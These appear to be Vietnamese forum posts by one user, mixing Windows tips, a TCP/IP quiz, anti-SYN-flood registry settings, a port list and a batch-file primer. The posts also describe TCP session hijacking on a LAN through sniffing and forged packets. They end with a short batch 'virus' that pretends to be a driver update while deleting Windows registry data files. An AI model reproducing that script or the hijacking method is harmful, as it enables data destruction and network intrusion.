Messages posted by: Reversing...

Thì ra các pro diệt virus bằng tay cả à. Đáng khâm phục.

Cái này dùng Winapi can thiệp được thì phải :?

Tự học = Tự hào smilie

Bữa trước tớ cũng bị y như thế. Không lôi ra được thằng Ubuntu, thế là tớ cài thằng Suse đè lên thằng Ubuntu luôn. Rồi sau đó có ghost hay cài lại Win thì nó vẫn hiện ra cả 2 thằng (Win + Linux) cho mình dùng. Vậy là sao nhỉ?---> kô hiểu.

Cám ơn anh rất nhiều. Học mấy cái này bằng tiếng Anh đúng là khó nuốt quá. Liệu có ai có t bộ từ điển Anh-Việt chuyên ngành Tin không nhỉ? ?

Cứ sống hòa bình với nó là OK thôi smilie

Trong trường hợp này, cách tốt nhất là cài BitDefender 10 vào, update và scan. Nếu vẫn không diệt được nữa thì chỉ còn cách ghost máy again !

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] target_name

Options:
-t Ping the specified host until stopped.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
[From cmd-> ping /? ]

Tớ đang học về phần TCP/IP. Có vài câu trắc nghiệm về TCP/IP cần giải quyết.
Trong danh sách câu hỏi có một vài phần chữ vàng bằng tiếng Anh tớ không hiểu.Mong mọi người giúp đỡ:

1)Bạn muốn copy một file từ một remote host. Phải chọn giao thức nào :
a)TCP, b)FTP Server , c) RCP, d)Telnet , e)Tất cả giao thức trên.
2)Bạn đã cài đặt một card mạng trên máy tính. Bạn dùng TCP/IP. Để kết thúc cài đặt này bạn cần biết gì nữa:
a)IP , b) Netsmask, c) Workgroup name, d)Tất cả cái trên.
3)Bạn muốn minimize broadcast name resolution trong mạng NetBios. Cần phải làm gì:
a)Sử dụng DNS phân giải tên miền
b)Cài đặt dịch vụ DNS trên một BDC.
c)Cài đặt WINS trên một server.
d)Modify the DHCP scope to add the WINS server IP.
e) Tất cả điều trên.
4)Bạn muốn chuyển một file đến server UNIX. Cần sử dụng gì:
a) TCP/IP , b) FTP, c) NFS Client, d)SMB Client
5)Giả sử bạn có một IP dưới dạng nhị phân là 00100110.11110011.10010110.0000001. Ở dạng thập phân nó sẽ là:
a)76.243.150.1
b)38.241.150.1
c)38.243.150.1
d) Tất cả a, b, c đều sai
6)Bạn muốn thực hiện một lệnh trên một UNIX remote server. Bạn cần xác thực để thực hiện lệnh này. Dịch vụ nào cần được sử dụng:
a)FTP, b) REXEC, c)TTelnet, d)RSH, e)RCP
7)Số hops mặc định cho Tracert là bao nhiêu?
a)16 , b) 32, c)24, d) 30
8)Bạn có 4 subnets , mỗi subnet có 200 host. Bạn muốn gán các IP thông qua một host DHCP. Cần dùng bao nhiêu DHCP server?
a)1 DHCP Server / 1 subnet
b)2 DHCP Server với cấu hình scopes tương tự nhau
c)At least two DHCP sever for redundancy with 75/25 % subnet IP splits
d)Một DHCP Server và 4 DHCP Relay host.
9)Bạn có địa chỉ mạng là 139.21.0.0. Bạn muốn nâng số địa chỉ sao cho có thể nhận được 1025 host trên mỗi subnet. Hỏi subnet mask nào nên được sử dụng
a)255.255.255.0
b)255.255.240.0
c)255.255.248.0
d)255.255.252.0
e)255.255.254.0
10)Để biến WINS thành một proxy agent cho các non-WINS client. Cần làm theo cách nào?
a)WINS Manager->Option->Proxy Agent Enabled = 1
b)WINS Manager->Server->Configuration->Advanced->Proxy agent-->(Set to) Enabled
c)Regedit32, sửa : HLC\System\CurrentControlSet\Services\NetBT\Parameters
d)Regedit32, sửa: HLC\System32\CurrentControlSet\Set\Services\NetBT\Parameters
e)EnableProxy -> 1
11)Bạn có một domain tên Solitary.com. Bạn thêm domain này vào DNS ở đâu?
a)Domain Name Service Manager.
b)Click DNS and Add Domain Name "Solitary.com"
c)Click Server and then DNS-->Add Domain
d)Click Server and then click DNS-->Add Zone
e)Right click on Server and then click Add Zone
12) Cho IP: 131.142.96.0 và subnet mask 255.255.240.0, hỏi địa chỉ mặc đinh của gateway là:
a)131.142.88.0
b)131.142.103.7
c)131.142.95.254
d)131.142.98.7
e)131.142.96.255
Các câu sau là nguyên văn tiếng Anh .
13)Bạn không có tài khoản trên một UNIX server. Bạn muốn tải file từ server đó về máy mình. Công cụ nào sau đây được sử dụng:
a. Net use * UNIXServer\\Resource , b. FTP , c. TFTP , d. DNS , e. Telnet
14)Bạn có tài khoản trên một UNIX server. Bạn muốn tải file từ server đó về máy mình. Công cụ nào sau đây được sử dụng:
A. Net use * UNIXServer\\Resource , b. FTP , c. TFTP , d. DNS , e. Telnet
15)Bạn muốn kết nối đến router để xem thống kê về mạng WAN. Giao thức nào sau đây được sử dụng để kết nối đến router?
a. TFTP, b. FTP , c. RCP , d. Telnet ,e. None of the above
16)Bạn muốn copy một file từ một remote host. Giao thức nào sau đây được dùng?
a. TCP , b. FTP Server , c. RCP , d. Telnet , e. All of the above
17)Giao thức nào sau đây không cho phép tải file từ remote host về máy?
a. TFTP, b. FTP , c. RCP , d. Telnet , e. All of the above
18)Tiện ích TCP/IP nào sau đây cho phép biết được thông tin về người dùng từ remote host?
a. Archie , b. FTP , c. Hostname , d. Finger , e. Whois
19)Bạn muốn biết có bao nhiêu unread message trên mailserver. Tiện ích nào sau đây được dùng?
a. Archie ,b. FTP ,c. Hostname ,d. Finger ,e. Whois
20)Which of the following gives you a connectionless communication transfer protocol?
a. FTP ,b. UDP ,c. TCP ,d. SMTP
21)George is using [color= yellow]printer interface cards that require LPR ports to be set up at the server for printing. What does he need to install on the print server?
A. Nothing. Windows NT server installs all the printing services automatically.
B. Move the spooler files to a NTFS partition.
C. Install Microsoft TCP/IP Printing support in Network-->Services tab.
D. Install Microsoft Simple TCP/IP Services in the Network-->Services tab.
E. All of the above.
22)You want to set up a RAS client on a Windows NT Workstation. What must you do to install RAS Client?
A. My Computer-->Control Panel-->Services-->ADD -->Remote Access Services
B. My Computer-->Control Panel-->Network-->Services-->ADD -->Dial Out Services
C. My Computer-->Control Panel-->Network-->Services-->ADD -->Remote Access Services
D. My Computer-->Control Panel-->Network-->ADD -->Remote Access Services

Sao không có Acer? Nó chỉ có mỗi khuyết điểm về đồ họa, còn lại thì rất tốt: máy cấu hình mạnh mà giá rất phải chăng.

Thôi bạn đừng cố gắng vô ích nữa. Windows chứ có phải mấy cái software rẻ tiền đâu. Thử cho một lập trình viên bên Microsoft đột nhập vào Window thử xem có làm được không? Thường dân thì nên chịu khó học mấy cái cơ bản đàng hoàng thì tốt hơn.

Nếu cảm thấy bất lực , bạn có thể mail cho Bill Gate qua địa chỉ billg@microsoft.com để bàn về vấn đề này.

Vậy cho tớ hỏi là làm thế nào để biết được tham số truyền vào cho hàm nằm trong stack mà không phải là một nơi khác? Nếu lập trình assembler bản thân người lập trình có thể gọi stack ra để truyền tham số cho hàm, còn với các ngôn ngữ khác thì sao?

Trước hết tải chương trình này về:
http://rapidshare.com/files/81961675/DMBooks.exe
Sau đó chạy nó, đến phần chọn language các bạn chọn English ( mặc định nó là tiếng Nga ).
Trong này có rất nhiều chủ đề để download, nếu muốn sách về Tin thì các bạn chọn phần sách Tin.
Host khá lớn ( 23 GB ), hầu hết các cuốn sách nổi tiếng đều có tại đây.

Còn đây là tập hợp hầu hết các cuốn sách của nhà xuất bản O'Relly , dung lượng khoảng 235Mb.
download tại đây

Đây là các cuốn sách của NXB Wiley , dung lượng khoảng 600Mb
download tại đây

-- ENJOY --

Cái thu được sau khi đọc một topic không nằm ở 2 chữ "SƯU TẦM", mà nằm ở nội dung. Đó là quan điểm của tớ. Xin dừng topic tại đây.

Chào tmd, tớ có vài lời thế này:
Thứ nhất, đã là thủ thuật thì chỉ có thể là sưu tầm hoặc mò mẫm, có cần thiết phải nói rõ ra nguồn ở đâu không trong khi các vấn đề hết sức đa dạng và trong khi tác giả còn không nhớ chính "tác giả" là ai nữa !. Không cần lắm bởi lên Google là có tất. Vấn đề ở đây, sẽ có những điều còn mới mẻ với một số người, có người biết có người chưa biết, có thể cậu thấy các vấn đề được nêu ra dễ dàng và cũ quá thì có lẽ topic này không thích hợp với cậu, tớ viết cho những người "bắt đầu" quậy Windows ( tớ đây chẳng hạn ) thôi.
Thứ hai, về câu hỏi của anh Đì phen đơ, muốn trả lời được em đây chưa đủ trình độ để nói đầy đủ và rõ ràng về tấn công DOS, tuy nhiên cái trên là em tìm được, và chắc chắn là nó sẽ có ích trong việc phòng chống DDos, cụ thể , để khách quan, em trích dẫn bằng tiếng Anh những điều đã nói:
1)TcpMaxDataRetransmissions

Determines how many times TCP retransmits an unacknowledged data segment on an existing connection. TCP retransmits data segments until they are acknowledged or until this value expires.

TCP/IP adjusts the frequency of retransmissions over time. TCP establishes an initial retransmission interval by measuring the round trip time on the connection. The interval doubles with each successive retransmission on a connection, and it is reset to the initial value when responses resume.

2)SynAttackProtect

Determines whether the SYN flooding attack protection feature of TCP/IP is enabled. SYN flooding attack protection is enabled when the value of this entry is 1

3)TcpMaxConnectResponseRetransmissions

Determines how many times TCP retransmits an unanswered SYN-ACK (connection request acknowledgment). TCP retransmits acknowledgments until they are answered or until this value expires. This entry is designed to minimize the effect of denial-of-service attacks (also known as SYN flooding ) on the server.

4)TcpMaxHalfOpen

Determines how many connections the server can maintain in the half-open (SYN-RCVD) state before TCP/IP initiates SYN flooding attack protection . This entry is used only when SYN flooding attack protection is enabled on this server, that is, when the value of the SynAttackProtect entry is 1 and the value of the TcpMaxConnectResponseRetransmissions entry is at least 2.

5)TcpMaxPortsExhausted

Determines how many connection requests the system can refuse before TCP/IP initiates SYN flooding attack protection . The system must refuse all connection requests when its reserve of open connection ports runs out. This entry is used only when SYN flooding attack protection is enabled on this server, that is, the value of the SynAttackProtect entry is 1 and the value of the TcpMaxConnectResponseRetransmissions entry is at least 2).

6)TcpMaxHalfOpenRetried

Determines how many connections the server can maintain in the half-open (SYN-RCVD) state even after a connection request has been retransmitted. If the number of exceeds the value of this entry, TCP/IP initiates SYN flooding attack protection . This entry is used only when SYN flooding attack protection is enabled on this server, that is, when the value of the SynAttackProtect entry is 1 and the value of the TcpMaxConnectResponseRetransmissions entry is at least 2.

7)EnableDeadGWDetect

Determines whether TCP performs dead gateway detection. Dead gateway detection is a TCP feature that identifies gateways that are not operating properly and that switches the computer to a new default gateway.

8)AllowUnqualifiedQuery

Determines whether the Domain Name System (DNS) permits unqualified queries.

An unqualified query does not include the domain name. Any matching host name satisfies it. The query format is the host name followed by a period: hostname .

If unqualified queries are not permitted and a query is submitted without a domain name, the DNS service automatically appends the name of the local domain.

9)DisableDynamicUpdate

Disables the Domain Name System (DNS) dynamic update registration for all interfaces on the system.

With dynamic update, DNS client computers automatically register and update their resource records whenever address changes occur.

regedit

(Start--->RUN--->Regedit)

--> HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Tạo một khóa có tên Psched ( nếu nó chưa có )
---> Thêm một value DWORD có tên "MaxOutstandingSends".
---> modify value data : 65535. ( chọn base Hex)
Dưới đây là một vài khóa giúp chống DDos.

[HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS]
"SYNATTACKPROTECT"=DWORD:00000002
"TCPMAXDATARETRANSMISSIONS"=DWORD:3
"TCPMAXHALFOPEN"=DWORD:64
"TCPMAXHALFOPENRETRIED"=DWORD:50
"TCPMAXPORTSEXHAUSTED"=DWORD:1
"TCPMAXCONNECTRESPONERETRANSMISSIONS"=DWORD:2
"ENABLEDEADGWDETECT"=DWORD:0
"ENABLEPMTUDISCOVERY"=DWORD:0
"KEEPALIVETIME"=DWORD:300000
"ALLOWUNQUALIFIEDQUERY"=DWORD:0
"DISABLEDYNAMICUPDATE"=DWORD:1

-- HAVE FUN --

Bây giờ ta sẽ tìm hiểu về một số file hệ thống quan trọng nhất của Windows, mà nếu biết rõ chúng, bạn có thể làm chủ máy tính của mình.
1) boot.ini
- Vị trí: C:\
- Miêu tả:

File chạy ngầm. Thiếu nó hệ điều hành không thể chạy được. Trong nó có chứa nhiều phần. Nói chung không nên thay đổi gì file này.
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional RU" /noexecute=optin /fastdetect

2)pagefile.sys
-Vị trí: C:\
-Miêu tả:File chứa các dữ liệu tạm thời và không được load vào bộ nhớ
3)hiberfil.sys
-Vị trí: C:\
-Miêu tả: Chức năng của nó là thực hiện chế độ ngủ đông cho máy. Sau khi thoát khỏi chế độ này, máy tính khôi phục lại tình trạng bộ nhớ và dữ liệu trước khi hilbernate trên đĩa.
4)RECYCLE
-Vị trí: C:\
-Miêu tả: File ẩn, chính là Trash
5)System Volume Information
-Vị trí: C:\
-Miêu tả:Thư mục ở dạng ẩn. Trong nó có chứa các dịch vụ khôi phục dữ liệu hệ thống. Chương trình khôi phục sẽ copy dữ liệu trong registry vào thư mục này. Trong thư mục này chứa các thư mục con có dạng _restore{GUID}RPxSnapshot , và đây chính là các điểm cần khôi phục của hệ thống.
6) Temp
-Vị trí: C:\Windows\temp
-Miêu tả: Thư mục chứa các file hiện thời khi một chương trình đang được cài đặt
7) Prefetch
-Vị trí: C:\Windows\Prefetch
-Miêu tả: Trong thư mục này chứa các liên kết ( links) đến các ứng dụng hay chương trình đã được thực thi. Theo thời gian thì dung lượng thư mục này sẽ lớn dần , và nếu xóa nội dung thư mục này máy của bạn sẽ chạy cực nhanh. Tuy nhiên, nếu bạn có xóa thư mục này đi, thì đừng restart máy ngay, nó sẽ làm chậm hệ thống !
8)Media
-Vị trí: C:\Windows\Media
-Miêu tả: Chứa các file .WAV cho windows
9)SoftwareDistribution
-Vị trí: C:\Windows\SoftwareDistribution
-Miêu tả: Chứa các file Automatic Update của hệ điều hành
10)i386
-Vị trí: C:\Windows\Driver\i386
-Miêu tả: Chứa cache driver.
11)WinSxS
-Vị trí: C:\Windows\WinSxS
-Miêu tả: WinSxS hay Window Side by Side, là một điểm mới của WinXP, nó chứa các phiên bản giống nhau của thư viện liên kết động và sẽ cung cấp cho các chương trình khi cần đến nó.
12)Dllcache
-Vị trí: C:\Windows\System32\Dllcache
-Miêu tả: Trong thư mục chứa các file hệ thống được bảo vệ dùng để tự động update hệ thống trong trường hợp hệ điều hành bị hư hỏng.
13)Config
-Vị trí: C:\Windows\System32\Config
-Miêu tả: Trong thư mục chứa các file làm việc với registry
14)sysoc.inf
-Vị trí:C:\Windows\Inf\Sysoc.inf
-Miêu tả:Trong quá trình cài đặt windows, win không cho phép ta chọn những chương trình cần thiết để cài đặt. Vào Add or Remove Program, Win ẩn các chương trình như game...Nếu bạn muốn remove chúng, tìm file sysoc.inf , rồi xóa tất cả các từ HIDE có trong đó. Chúng sẽ lộ diện.

Bây giờ ta sẽ nói về các cổng vào ra của máy tính. Mỗi cổng gắn liền với một giao thức . Có tất cả 65000 cổng , 1024 cổng đầu tiên là các cổng "mở", còn lại là "đóng". Qua các cổng đầu tiên, hacker có thể thực hiện thâm nhập vào máy của bạn. Dưới đây là một vài điều nên biết:

7:echo - Dịch vụ này không quan trọng lắm. Nhiệm vụ: trả lời các truy vấn TCP-UDP. Có thể loại bỏ

11,15:systat и netstat - Các cổng này càng nên được loại bỏ! Chúng trả lời các truy vấn từ xa của máy tính bên ngoài nhằm thu thập thông tin về máy của bạn! Do đó hãy chú ý đến các cổng này...

19:chargen - dịch vụ này chuyển nội dung của echo. Tuy nó có thể được loại bỏ, tuy nhiên lại cần trong một số trường hợp .

21:ftp (file transfer protocol) - dịch vụ truyền tập tin. Không thể thiếu nó . Tuy nhiên tớ sẽ nói về cách bảo vệ cổng này .

23:telnet - ооооо....Qua cổng này một người lạ có thể biết được nhiều thông tin về máy của bạn...Nó có thể làm được rất nhiều! Bởi thế, nên loại bỏ nó.

25:smtp - Dịch vụ truyền thư điện tử.
53:domain - DNS- dịch vụ này cho phép chuyển tên miền (ví dụ www.hvaonline.net ) vào dạng số hóa (địa chỉ IP:72.232.147.252 ). Không nên loại bỏ, tuy thế cũng cần phải bảo vệ.

69:tftp - Thường dùng trong LAN, đây là dạng ftp đơn giản.

79:finger - dùng để lấy thông tin về hệ thống. Không cần thì cũng loại nốt.
80:http - dịch vụ truyền các file .html ( siêu văn bản ). Ta dùng nó hằng giờ

109,110:pop - mở nó có thể bạn bị bom-mail. Nếu chưa biết e-mail rõ ràng, tốt nhất loại nó đi.
111,135,137-139:postmap,loc-serv. nbname, nbdatagram,nbsession - Không nên loại chúng.--> winnuke!(139)

161:snmp - giao thức quản lý mạng. Dùng để điều hành các thành phần của mạng.

512-520:rexec(),rsh,talk... - Và đây. Ta cần đặc biệt chú ý. Bởi vì qua đây hacker có thể chạy một chương trình trên máy bạn... Hãy chú ý đến nó.
540:uucp - dùng trong unix, dùng để truyền dữ liệu giữa các máy UNIX.

Đối với ta, thế là đủ .
Cách loại bỏ một cổng :

*Chạy regedit.exe trong cmd.
* Tìm trong registry tất cả các cổng bạn muốn loại bỏ, sau đó gán giá trị 0 hoặc 1 cho nó
*Restart Windows

Bảo vệ các cổng: Có 2 cách:

* Xem lại cái trên
* Có thể lập trình:
Ta có 2 lựa chọn
*Tự viết một chương trình .
*Sử dụng các phần mềm.

Đầu tiên là viết chương trình . Có các dòng lệnh sau có thể sử dụng được

// basic
winsock1(80).close;
unload winsock1(80);
//delphi
winsock.closesocket(80);
winsock.connect(80,);

Cụ thể xin mời các bạn tự tìm đọc một giáo trình về ngôn ngữ lập trình để tìm hiểu thêm.
Còn bây giờ sẽ là một vài chương trình cho phép quản lí các cổng:
Các chương trình sau ( theo tớ ) là tốt nhất:

blackice defender-
zonealarm pro-
lockdown- ( nên sử dụng thằng này )
Outpost Firewall Pro

Có một số game khá hay cho hacker: có thể download tại đây
hoặc đây
--- HAVE FUN ---

to Kasaki: Đúng rồi, tớ quên mất. Sẽ chỉnh lại .

Packet #1764, Direction: Out, Time:12:37:28.268590, Size: 154
Ethernet II
Destination MAC: 00:06:29:B0:F2:AF
Source MAC: 00:1B:24:32:52:81
Ethertype: 0x0800 (2048) - IP
IP
IP version: 0x04 (4)
Header length: 0x05 (5) - 20 bytes
Differentiated Services Field: 0x00 (0)
Differentiated Services Code Point: 000000 - Default
ECN-ECT: 0
ECN-CE: 0
Total length: 0x008C (140)
ID: 0x3981 (14721)
Flags
Don't fragment bit: 1 - Don't fragment
More fragments bit: 0 - Last fragment
Fragment offset: 0x0000 (0)
Time to live: 0x80 (128)
Protocol: 0x06 (6) - TCP
Checksum: 0xE2DF (58079) - correct
Source IP: 10.162.5.91
Destination IP: 209.200.252.69
IP Options: None
TCP
Source port: 4604
Destination port: 22
Sequence: 0xAA9D1120 (2862420256)
Acknowledgement: 0x824F7DCA (2186247626)
Header length: 0x05 (5) - 20 bytes
Flags: PSH ACK
URG: 0
ACK: 1
PSH: 1
RST: 0
SYN: 0
FIN: 0
Window: 0xFCD7 (64727)
Checksum: 0xDE89 (56969) - incorrect
Urgent Pointer: 0x0000 (0)
TCP Options: None
SSH
Encrypted data: 56 7D 4A 06 BB C2 37 5A CD FC 5E 43 C2 1D 20 5A 45 30 37 CE 1F 50 F1 FA 98 4B 23 20 E7 F5 58 51 F9 07 C8 2A FA D8 11 FE CC B4 3D BE 4D 5C 84 D6 03 F3 4B 98 48 7A AC 0A 42 73 5E CB CF FB 5A BF AF DB

Đây là dữ liệu của một packet mà con sniffer tóm được.
Bây giờ tớ sẽ nói làm cách nào để thâm nhập vào một mạng LAN để có thể gởi các packet đến các máy trong LAN đó.
Trước hết, ta cần tìm hiểu về cấu trúc một gói packet TCP và cách thức giao tiếp của chúng.
TCP - Transmission Control Protocol là một trong các giao thức cơ bản của mức vận chuyển. Giao thức - đó là một tập hợp các hàm. TCP có 4 nhiệm vụ: Thiết lập liên kết, kiểm tra lỗi, gởi packet, đóng kết nối. Chính TELNET hay FTP ( thuộc tầng ứng dụng ) hoạt động ngay trên TCP này. Đặc trưng của một gói TCP nằm ở 2 ID: Sequence Number và Acknowledgement Number. Và thêm một cái gọi là Control Bits gồm 6 bit có nội dung:

URG: Urgent Pointer field sinificant
ACK: Acknowledgement field significant
PSH: Push function
RST: Reset connection
SYN: Synchronize sequence numbers
FIN: No more data from sender.

Ta chỉ cần thế. Bây giờ ta xem xét cách thức giao tiếp bằng các gói TCP như thế nào.
Đầu tiên TCP thiết lập kết nối. Công đoạn này gồm 3 bước:

Client->Server: SYN, ISSclient
Server->Client: SYN, ACK, ISNserver, ACK(ISNclient + 1)
Client->Server: ACK, ISNclient + 1, ACK(ISNserver + 1)

Một ghi chú: Cứ mỗi lần response: thì ISS(Initial Number) lại tự động tăng lên 1.
Trong WinNT, cứ mỗi 10ms(milisecond) ISN tự động tăng lên 1.
Và đây chính là mấu chốt của việc xâm nhập.
Ta cài một sniffer vào LAN. (Sniffer: một chương trình có nhiệm vụ theo dõi và đón bắt các gói dữ liệu trong LAN )
Và như đầu tiên ta thu được một gói packet TCP.
Muốn thâm nhập ta chỉ cần biết được các ISS của client và server là đủ ( không cần biết DATA có chứa gì ).
Bây giờ, ta tạo ra một packet với các trường ACK, ISNclient + 1, ACK(ISNserver + 1) và DATA. Nếu may mắn ta sẽ đón đúng session của kết nối. Nếu không, thay đổi ISNclient và ACK(ISNserver + 1).

Một sniffer có thể download tại đây
- Chúc may mắn -

1. Sử dụng notepad để ghi log

- Bạn tạo 1 file .txt mới, đặt tên tùy ý.
- Gõ ".LOG" ở dòng đầu tiên (không có dấu ngoặc "" ).
- Save lại.
- Từ bây giờ, mỗi lần mở file lên là notepad tự thêm ngày giờ vào cho mình ở dòng tiếp theo.

2. 1 trò vui với folder

- HKEY_CLASSES_ROOT là nơi chứa các kiểu file mà window hiểu (ví dụ: .psd, .doc....etc.)
- Trong HKEY_CLASSES_ROOT có 1 key tên là CLSID, nơi đây chứa các key khác định nghĩa những folder đặc biệt trong window, ví dụ:
+ my computer: {20D04FE0-3AEA-1069-A2D8-08002B30309D}
+ recyle bin: {5ef4af3a-f726-11d0-b8a2-00c04fc309a4}
+ control panel: {3FC0B520-68A9-11D0-8D77-00C04FD70822}
+ .......etc.
- Chuyện gì sẽ xảy ra nếu ta dùng các key đó để đặt tên đuôi cho 1 folder
+ ví dụ: bạn tạo 1 folder mới, đặt tên tùy thích (fun), sau đó bạn copy đoạn key tương ứng với các folder đặc biệt ở trên và paste vào sau tên thư mục với dấu chấm (fun.{20D04FE0-3AEA-1069-A2D8-08002B30309D})
- Thử double click vào folder đó xem ^^.
+ Với tên folder là fun.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
+ Khi double click vào, nó sẽ hiện ra folder của My Computer.
CÁI NÀY THÌ HAY NỮA NÈ:
+Với tên folder là KEY.{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}
+ Khi double click vào, nó sẽ hiện ra CÁI GÌ NHỈ....-> BẠN ĐÃ KHOÁ THƯ MỤC KEY VỪA TẠO RA RỒI ĐÓ...HAY PHẢI KHÔNG....TỰ KHÁM PHÁ TIẾP NHA
- Have Fun!

3. Cải thiện tốc độ

(nếu có trên 512MB Ram hãy thực hiện)
var Start -> run -> regedit, tìm key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\DisablePagingExecutive
set value cho nó là 1

4. Quản lý share folder

- Bạn đã share wá nhìu folder, bây giờ ko biết chúng ở đâu, hay là cần nơi quản lý tập trung?
- Vào start -> run -> fsmgmt.msc

5. Ẩn thư mục mình share trên mạng (LAN chẳng hạn)

- Đặt thêm ký hiệu "$" (ko có dấu "") vào sau tên folder cần share. ví dụ sharefolder$
- Những người ở trong cùng mạng lan sẽ ko thấy thư mục được share nhưng vẫn có thể truy cập vào được bằng cách gõ đúng đường dẫn đến thư mục đó
ví dụ: tên máy//sharefolder$

6. Ẩn máy tính của mình trong Network Neighborhood

- Nếu bạn có share file, nhưng lại muốn ẩn máy tính của mình trong Network Neighborhood.
- Vào start -> run -> net config server /hidden:yes

7. Đăng nhập vào tài khoản Administrator

- Bình thường nó bị ẩn. Hoặc chỉ hiện lên ở safe mode.
- Để nó hiện ra lúc bình thường: ở welcome screen, bạn nhấn Ctrl-Alt-Del 2 lần, nó sẽ lộ diện ^^.
- Hoặc vào đây HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList chỉnh lại

8. Làm sao để "No to all" khi chép đè file

- Khi copy file, nếu có file trùng, nó sẽ hiện bảng thông báo: bạn có muốn ghi đè ko? sẽ có 3 lựa chọn No - Yes - Yes to all.
- Bây giờ muốn No to all phải làm sao?. Để "No to all", bạn giữ phím shift khi click vào nút No.

9. Đóng nhiều cửa sổ cùng 1 lúc.

- Nếu bạn giữ phím Ctrl khi click chuột vào những chương trình đang chạy có trên Taskbar, bạn có thể chọn nhiều task cùng lúc.
- Việc còn lại chỉ là nhấp chuột phải và chọn "Close Group".

10. Tăng tốc bàn phím

- Vào control panel -> keyboard -> kéo 2 thanh bên trên qua hết mức bên phải.
- Nó giúp phím giảm delay cho phím back space, giúp ta nhanh chóng xóa chữ gõ nhầm.

11. View Full Screen

- Bạn mở 1 cửa sổ window, và nhanh chóng cảm thấy nó quá nhỏ so với việc bạn đang làm?
- Giữ phím Ctrl + double click lên title bar, cách này sẽ nhanh chóng chuyển cửa sổ sang chế độ fullscreen.
- Hãy quên nút Maximize đi Very Happy.

12. Đã xài window tại sao lại quên window key.

Windows : Hiển thị start menu
Windows + D: Thu nhỏ hoặc trả lại trạng thái ban đầu cho tất cả các cửa sổ.
Windows + E: Mở explorer.
Windows + F: Mở search for file.
Windows + Ctrl + F: Mở search for computer.
Windows + F1: Help and Support Center
Windows + R: Mở hộp thoại run.
Windows + break: Mở System properties.
Windows + shift + M: Undo minimize all windows
Windows + L: khóa workstation
Windows + U: mở Utility Manager

13. Bạn vào 1 thư mục, cây thư mục, muốn tìm nhanh 1 file hay 1 thư mục trong 1 đống hỗn độn.

- Đơn giản hãy nhấn phím tương ứng với chữ cái đầu tiên của tên thư mục hay file. Đừng nói là bạn ko biết tên file hay thư mục cần tìm nhé.
- Nếu muốn di chuyển tới, hãy nhấn tiếp tục.
- Tốc độ làm việc của bạn sẽ tăng lên rất nhiều đó.

14. Ngoài Ctrl-Shift-Del bạn có thể bấm Ctrl-Shift-Esc để mở task manager
15. Chỉnh mức độ ưu tiên cho chương trình

- Window là 1 hệ điều hành đa luồng, tức là ta có thễ làm nhìu chiện cùng 1 lúc, các chương trình chạy song song với nhau.
- Tuy nhiên đối với PC bình thường chỉ có 1 CPU 1 nhân thì ko thể có chiện này.
+ Các chương trình ko bao giờ chạy song song mà là chạy xen kẽ với nhau, nhưng vì tốc độ của CPU quá nhanh nên ta cứ tưởng chúng cùng chạy 1 lúc.
- Chương trình nào được ưu tiên thì sẽ được CPU ưu ái và quan tâm đến nó nhìu hơn Very Happy.
- Bấm Ctrl-Shift-Del hay Ctrl-Shift-Esc để mở task manager, vào tab Processes, nhấp chuột phải vào các chương trình đang chạy bên dưới chọn Set Priority rùi chọn mức bạn muốn, mặc định là normal.

16. Quan hệ giữa folder với file html

- Nếu bạn tạo 1 file html hay htm có tên là "document.htm".
- Và tạo thêm 1 folder tên là "document_files" thì cả 2 file và folder đó sẽ có mối quan hệ với nhau:
+ Nếu ta ra lệnh copy, cut, del, move 1 trong 2 file hoặc folder đó thì lệnh cũng sẽ thực hiện trên file hay folder còn lại.
+ Và khi rename 1 trong 2 file hoặc folder đó, sẽ có 1 cảnh báo xuất hiện.

17.Quậy My Computer

- Tạo file trong C:/windows/system với tên oeminfo.inf có nội dung
[general]
Manufacturer = hello
Model = World
[OEMSpecific]
SubModel =flfjslfjslfsdlfjf
SerialNo =123456497947294747
OEM1 =vcxxvxvx
OEM2 =vxvxvcvxvcvxvxv
[Support Information]
Line1 =MyName
Line2 =Windows
Line3 =My
Line4 =
Line5 =
- Click phải chuột vào My Computer->Properties

--HAVE FUN--

Bây giờ ta tìm hiểu các file .bat.

Các lệnh đơn giản:

echo off -
del %file%
copy %source% %dest%
mkdir %tên thư mục% - tạo thư mục
echo %text% - đưa text ra màn hình
echo %text%>%[path-to-file]% - ghi text vào file
echo %text%>>%[path-to-file]% - ghi text vào cuối file
if exist %[path-to-file]% %command% - nếu ... thực hiện lệnh
attrib %attr% %[path-to-file]% - Thiết lập đặc tính cho file ( +h- hidden, +s -system, +r -readonly)
start %[path-to-file]% - chạy file
cls - xóa màn hình
pause - hiển thị dòng lệnh: Press any key to continue...
label %nhãn% - tạo nhãn trên đĩa C
format %disk%:/q - format ổ đĩa
ren %source% %new-name% - đổi tên file
goto %nhãn% - nhảy đến label
...
...
...:%label%

Một vài thủ thuật:

%command% >nul - làm ẩn các câu lệnh và kết quả thực hiện .
Ví dụ: copy C:some.exe %windir%some.exe >nul
regedit /s %file.reg% - đưa thêm khóa vào regedit
Về tên đường dẫn. Ví dụ "Program Files" --> Progra~1.
copy C:some.exe C: Progra~1/some.exe
Cuối cùng là một script viết bằng javascript
echo var WSHShell = WScript.CreateObject("WScript.Shell"; >%temp%mes.js
echo WSHShell.Popup("Hello"; >> %temp%mes.js
start %temp%mes.js
del %temp%mes.js
tạo một dialog "Hello" trên Window.

Và bây giờ , chắc các bạn cũng có thể hiểu được nội dung của 2 con virus sau:
Code:

@echo off
echo Windows updating driver...
attrib -r -h -s C:Windows*.da?
echo Y| del C:Windows*.da?
